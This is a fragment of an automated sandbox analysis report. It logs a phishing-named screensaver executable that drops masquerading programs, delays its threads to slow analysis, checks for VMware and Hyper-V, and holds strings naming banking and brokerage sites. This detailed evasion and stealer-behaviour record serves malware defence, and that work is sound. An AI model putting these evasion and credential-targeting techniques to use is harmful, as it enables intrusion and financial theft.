                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99749s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99637s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99510s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99377s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99212s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98801s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98685s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98451s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97842s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97445s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97324s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97088s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99764s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98182s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -98075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97762s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97653s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97541s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -97094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -96984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -1199870s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -1199765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -1199654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 7404 | Thread sleep time: -1199531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe TID: 6204 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2668 | Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 3620 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 4668 | Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 | Thread sleep count: 8016 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248 | Thread sleep count: 1593 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7456 | Thread sleep time: -360480000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7456 | Thread sleep time: -226920000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7352 | Thread sleep count: 41 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7432 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 5356 | Thread sleep count: 487 > 30
Source: C:\Windows\System32\msdtc.exe TID: 5356 | Thread sleep time: -48700s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5452 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0045DD7C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99859
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99749
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99637
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99510
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99377
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99212
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99089
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98953
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98801
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98685
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98562
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98451
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98328
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98217
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98093
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97983
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97842
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97690
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97445
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97324
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97203
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97088
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99764
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99655
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99546
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99431
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99202
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99093
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98875
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98547
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98437
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98182
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98075
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97890
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97762
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97653
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97541
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97437
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97312
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97094
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96984
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199870
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199654
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #TSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 00000023.00000003.2314646412.0000000000644000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000023.00000003.2314901954.0000000000644000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: Native_Redline_BTC.exe, 00000006.00000002.2129851601.000000000055E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: alg.exe, 00000009.00000003.3298047259.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3259678244.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2177000744.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                            Source: SensorDataService.exe, 00000023.00000002.2422375544.0000000000630000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000023.00000003.2418758943.000000000062F000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000023.00000003.2418497581.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 GMicrosoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                            Source: SensorDataService.exe, 00000023.00000003.2314646412.0000000000635000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                            Source: Native_Redline_BTC.exe, 00000006.00000002.2129851601.000000000055E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: I-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: alg.exe, 00000009.00000002.3323934646.0000000000503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@cW%SystemRoot%\system32\mswsock.dll
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                            Source: snmptrap.exe, 00000024.00000002.3323126033.0000000000584000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Devicer%T#T
